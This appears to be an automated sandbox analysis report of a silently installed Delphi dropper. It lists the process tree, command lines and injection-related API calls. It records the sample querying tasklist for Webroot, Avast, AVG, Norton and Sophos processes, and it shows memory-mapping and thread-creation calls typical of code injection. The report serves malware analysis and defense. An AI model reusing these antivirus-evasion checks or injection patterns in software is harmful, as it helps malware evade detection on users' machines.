Commandline:	"C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe" /VERYSILENT
Imagebase:	0xfc0000
File size:	8'767'044 bytes
MD5 hash:	51F99EDDD33CC04FB0F55F873B76D907
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:15:38
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp" /SL5="$3043C,7785838,845824,C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe" /VERYSILENT
Imagebase:	0xa90000
File size:	3'367'424 bytes
MD5 hash:	F809F51E678B7F2E388F8C969EF902C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:16:06
Start date:	30/12/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	"timeout" 9
Imagebase:	0x7ff6ba150000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:16:06
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:16:15
Start date:	30/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"
Imagebase:	0x7ff6d3520000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:16:15
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:16:15
Start date:	30/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Imagebase:	0x7ff64aca0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:16:15
Start date:	30/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "wrsa.exe"
Imagebase:	0x7ff7982e0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:16:15
Start date:	30/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"
Imagebase:	0x7ff6d3520000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:16:15
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:16:15
Start date:	30/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Imagebase:	0x7ff64aca0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:16:15
Start date:	30/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "opssvc.exe"
Imagebase:	0x7ff7982e0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:16:16
Start date:	30/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"
Imagebase:	0x7ff6d3520000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:16:16
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:16:16
Start date:	30/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Imagebase:	0x7ff64aca0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:16:16
Start date:	30/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "avastui.exe"
Imagebase:	0x7ff7982e0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	12:16:16
Start date:	30/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"
Imagebase:	0x7ff6d3520000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	12:16:16
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	12:16:16
Start date:	30/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Imagebase:	0x7ff64aca0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	12:16:16
Start date:	30/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "avgui.exe"
Imagebase:	0x7ff7982e0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	12:16:16
Start date:	30/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"
Imagebase:	0x7ff6d3520000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	12:16:16
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	12:16:16
Start date:	30/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Imagebase:	0x7ff64aca0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	12:16:16
Start date:	30/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "nswscsvc.exe"
Imagebase:	0x7ff7982e0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	12:16:17
Start date:	30/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"
Imagebase:	0x7ff6d3520000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	12:16:17
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	12:16:17
Start date:	30/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Imagebase:	0x7ff64aca0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	12:16:17
Start date:	30/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "sophoshealth.exe"
Imagebase:	0x7ff7982e0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	12:16:21
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
Imagebase:	0x400000
File size:	846'325'235 bytes
MD5 hash:	6A8860A8150021B2D5B9BB707DE4FA37
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	31.6%
Total number of Nodes:	117
Total number of Limit Nodes:	10

Executed Functions

Function 0299E7D7 Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 0299E870
NtMapViewOfSection.NTDLL(?,00000000), ref: 0299E918
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0299EC8C
NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 0299ED41
VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 0299ED5E
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 0299EE01
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 0299EE34
CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0299EFA5

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID: Virtual$ProtectSection$CreateView$AllocThread
String ID:
API String ID: 1248616170-0
Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
Instruction ID: 2b4227ab6a73287fb0959cbffea78071a0aa67eb4efd3d91da2813249d1fbf16
Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
Instruction Fuzzy Hash: 3E427A71608301AFDB24CF28C844B6BBBE9FF88724F08492EF9859B251E771E845CB51

Function 02950B27 Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,0295066D,?,00000001,?,81EC8B55,000000FF), ref: 02950B65
Thread32First.KERNEL32(00000000,0000001C), ref: 02950B91
Wow64SuspendThread.KERNEL32(00000000), ref: 02950BE4
CloseHandle.KERNEL32(00000000), ref: 02950C0E

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
String ID:
API String ID: 1849706056-0
Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction ID: 4d9d42f666f8bd544765239caecf87822710eb09ff61a86ea92a5ab904d81b45
Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction Fuzzy Hash: 1C410C75B00118AFDB18DF98C490FADB7B6EF88304F208168EA159B794DB74AE45CB94

Function 02950417 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 399
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 029506BA
TerminateProcess.KERNELBASE(000000FF,00000000), ref: 029509AE

Strings

V??, xrefs: 029504A1

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID: CreateProcessTerminateThread
String ID: V??
API String ID: 1197810419-4017582229
Opcode ID: f90b687535fed890c4755ef56f511dae09c8fb10a63dde2df152bbf0aa08052a
Instruction ID: 6134054f6ae4f8d3693d7216e0a127d1ecb15b8a6dde4bcd5f0d5407a2e50281
Opcode Fuzzy Hash: f90b687535fed890c4755ef56f511dae09c8fb10a63dde2df152bbf0aa08052a
Instruction Fuzzy Hash: 0412B4B4E00219DFDB14CF98C990BADBBB2FF88304F2486A9D915AB395C7356A41CF54

Function 029509D7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02950AA3

Strings

,, xrefs: 02950AEF

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: ,
API String ID: 2422867632-3772416878
Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction ID: 4c1e9d3d837380470518cac9292905fab8125e019799679b89489a0abaaa4e7d
Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction Fuzzy Hash: 7441B674A00219EFDB04CF98C994BAEB7B1FF88314F208598E9156B381D771AE81CF94

Function 0299F455 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00000000,?,?), ref: 0299F4E7

Strings

.dll, xrefs: 0299F48C

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .dll
API String ID: 1029625771-2738580789
Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction ID: 222de79594aeb85242e50c3d229c285d52f1e582f2a881f3e0ec493f30bf1adf
Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction Fuzzy Hash: B921E4326002858FEF21CFACD848B6ABBA8BF06378F08406DD809CBE41D730E845C790

Function 0299E0A7 Relevance: 2.8, APIs: 2, Instructions: 325
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0299E121
VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 0299E465

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
Instruction ID: 07d33f5e4c4afef521e30aca3c884e2d8762c006de8fe3e29facd3fb08e9b15c
Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
Instruction Fuzzy Hash: DFB1DF71500B06EBDF25EA68CC81BABF7ADFF49324F14092AE9D986150E731E550CFA1

Non-executed Functions

Function 029631F4 Relevance: 133.4, Strings: 105, Instructions: 2121COMMON

Download Yara Rule

Strings

U, xrefs: 029641C6
q, xrefs: 02964961
2, xrefs: 02963B86
2, xrefs: 02965214
3, xrefs: 029652CA
7, xrefs: 029649F1
$, xrefs: 02964491
h, xrefs: 029639A0
;, xrefs: 02964840
8, xrefs: 02964845
s, xrefs: 0296368B
], xrefs: 02964408
5, xrefs: 02964ECD
Q, xrefs: 02964D39
3, xrefs: 0296520F
f, xrefs: 02964A61
Z, xrefs: 02964951
$, xrefs: 02964629
#, xrefs: 02964901
x, xrefs: 02963469
H, xrefs: 02964196
2, xrefs: 02964313
X, xrefs: 02964D71
}, xrefs: 02964C99
,, xrefs: 02964941
7, xrefs: 029645C1
W, xrefs: 02964D69
u, xrefs: 02964C59
5, xrefs: 0296431B
6, xrefs: 02964A41
0, xrefs: 029650AC
+, xrefs: 02963C90
3, xrefs: 029650B1
5, xrefs: 029650BB
_, xrefs: 029648C1
5, xrefs: 02963B76
2, xrefs: 029652CF
3, xrefs: 02964EC0
0, xrefs: 02964303
%, xrefs: 02964C01
5, xrefs: 02964FF0
o, xrefs: 02964D29
B, xrefs: 02963FAD
;, xrefs: 02963B66
Y, xrefs: 02964D79
D, xrefs: 02965162
+, xrefs: 02964C21
a, xrefs: 02964CB9
k, xrefs: 02964D09
i, xrefs: 02964CF9
2, xrefs: 029650B6
A, xrefs: 0296324E
^, xrefs: 029648B1
g, xrefs: 02964CE9
%, xrefs: 02964631
m, xrefs: 02964D19
q, xrefs: 02964C39
D, xrefs: 02964E1D
S, xrefs: 02964D49
w, xrefs: 02964C69
J, xrefs: 02964070
3, xrefs: 02964FE0
K, xrefs: 02964A31
c, xrefs: 02964CC9
2, xrefs: 02964FE8
5, xrefs: 02965219
:, xrefs: 0296483B
N, xrefs: 029649B1
T, xrefs: 02964403
s, xrefs: 02964C49
|, xrefs: 02964A21
-, xrefs: 029645F1
0, xrefs: 02964FD8
+, xrefs: 029645E1
/, xrefs: 02964601
J@, xrefs: 02963E1C
r, xrefs: 02964080
U, xrefs: 02964D59
-, xrefs: 02963D0F
C, xrefs: 02963899
!, xrefs: 02964611
z, xrefs: 02964A51
*, xrefs: 02964931
., xrefs: 02963D14
y, xrefs: 02964C79
8, xrefs: 02964981
e, xrefs: 02964CD9
5, xrefs: 029652D4
$, xrefs: 029648F1
5, xrefs: 029645B1
U, xrefs: 029648D1
{, xrefs: 02964C89
3, xrefs: 0296430B
0, xrefs: 029652C5
J@o, xrefs: 02963E0F
2, xrefs: 02964EC5
0, xrefs: 02964EBB
`, xrefs: 02964295
., xrefs: 0296337F
-, xrefs: 029637C5
/, xrefs: 02963D19
3, xrefs: 029649D1
#, xrefs: 02964621
0, xrefs: 0296520A
), xrefs: 029645D1

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: !$#$#$$$$$$$%$%$)$*$+$+$+$,$-$-$-$.$.$/$/$0$0$0$0$0$0$2$2$2$2$2$2$2$3$3$3$3$3$3$3$5$5$5$5$5$5$5$5$6$7$7$8$8$:$;$;$A$B$C$D$D$H$J$J@o$J@$K$N$Q$S$T$U$U$U$W$X$Y$Z$]$^$_$`$a$c$e$f$g$h$i$k$m$o$q$q$r$s$s$u$w$x$y$z${$|$}
API String ID: 0-84802584
Opcode ID: 64614e14ec7528c1e2750346c2a54d0e3d9c7fa8ecbe65397c0fcfb9d7578e2b
Instruction ID: 15bd975e6ac8311e0d06ec35263c43138771f744509433639959fdd800449cc1
Opcode Fuzzy Hash: 64614e14ec7528c1e2750346c2a54d0e3d9c7fa8ecbe65397c0fcfb9d7578e2b
Instruction Fuzzy Hash: 3113BC3150C7C18AD335DB7888983AFBBD2ABD6324F098A6DD4E9873D2D6798405CB53

Function 029760D4 Relevance: 24.2, Strings: 19, Instructions: 449
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4, xrefs: 029761F8
XS, xrefs: 02976647
F;D, xrefs: 029769AF
jh, xrefs: 0297644E
"G7A, xrefs: 02976B1E
{u, xrefs: 02976B3F
"+, xrefs: 02976271
0[, xrefs: 0297665D
z+@%, xrefs: 02976ABB
!s#m, xrefs: 02976B55
7J0H, xrefs: 029769D0
#o+i, xrefs: 02976B60
[A, xrefs: 02976652
c/~), xrefs: 02976AB0
V3}-, xrefs: 02976AA5
UR, xrefs: 029769ED
nl, xrefs: 02976443
6g,a, xrefs: 02976B76
zx, xrefs: 029769A4

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: F;D$zx$!s#m$"G7A$"+$#o+i$0[$6g,a$7J0H$UR$V3}-$XS$[A$c/~)$z+@%$4$jh$nl${u
API String ID: 0-2874704925
Opcode ID: 7b3b8fa3fa73f246300358e773539e9ee7c01da76b8fc6a59d7d2418ab1a2215
Instruction ID: cfd8ec4fab8b676e24a5fd5075de399c174eedb77fb37f284a4308a4c527999a
Opcode Fuzzy Hash: 7b3b8fa3fa73f246300358e773539e9ee7c01da76b8fc6a59d7d2418ab1a2215
Instruction Fuzzy Hash: 3832E9B160C3848AD334CF59C042BCFBAF1EB92304F50892DC5E96B256D7B1564A8B9B

Function 0296EC04 Relevance: 17.2, Strings: 13, Instructions: 911
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

MNIK, xrefs: 0296EF64
94, xrefs: 0296EFE4
NvEa, xrefs: 0296EF74
]_@], xrefs: 0296EFC3
g5FT, xrefs: 0296EF7C
PGNC, xrefs: 0296EFAD
o`az, xrefs: 0296F396
/]]S, xrefs: 0296F2CA
a@I;, xrefs: 0296EF6C
Dy{u, xrefs: 0296EFA2
{HUm, xrefs: 0296EF84
XY[_, xrefs: 0296F2C2
L}~3, xrefs: 0296EF97

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: /]]S$94$Dy{u$L}~3$MNIK$NvEa$PGNC$XY[_$]_@]$a@I;$g5FT$o`az${HUm
API String ID: 0-704972004
Opcode ID: 27384c4293b8471bc7ec7c8b32103b74f0950fbecc65ffde0f091b486eade588
Instruction ID: 9343e17b87cda1c474a5d584fe3c1b25c461e41ab7d5583be519797416d864b7
Opcode Fuzzy Hash: 27384c4293b8471bc7ec7c8b32103b74f0950fbecc65ffde0f091b486eade588
Instruction Fuzzy Hash: CC6226755083818FC721CF28D85476EBBE2AFD5314F088A6DE8E99B392D735C906CB52

Function 02970DDC Relevance: 12.9, Strings: 10, Instructions: 448
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#, xrefs: 02970F56
', xrefs: 02970F46
., xrefs: 02970F62
;, xrefs: 02970F36
!, xrefs: 02970F4E
-, xrefs: 02970F5E
/, xrefs: 02970F66
?, xrefs: 02970F26
%, xrefs: 02970F3E
9, xrefs: 02970F2E

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: !$#$%$'$-$.$/$9$;$?
API String ID: 0-212839083
Opcode ID: a4fb63d73f881168efce714a4cd1c1ccca62a20d0c45ca9a0efa8071f4cac2bb
Instruction ID: c6f0eee7f674fef8c7827443220af6ea642615852771ee71eba2ef71b26864c4
Opcode Fuzzy Hash: a4fb63d73f881168efce714a4cd1c1ccca62a20d0c45ca9a0efa8071f4cac2bb
Instruction Fuzzy Hash: 0F127B21508BC29ED315CB3C8888756BF926B66224F1CC79DD4F94BBD3C379A116C7A2

Function 0295A974 Relevance: 11.7, Strings: 9, Instructions: 413COMMON

Download Yara Rule

Strings

vzXD, xrefs: 0295AA8A
r:D`, xrefs: 0295AA62
SFQx, xrefs: 0295AABA
y{cf, xrefs: 0295AA6A
@F\D, xrefs: 0295AAA2
imm,, xrefs: 0295AA82
F, xrefs: 0295AAF1
d)<s, xrefs: 0295AA7A
_C]G, xrefs: 0295AAB2

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: @F\D$F$SFQx$_C]G$d)<s$imm,$r:D`$vzXD$y{cf
API String ID: 0-1750344848
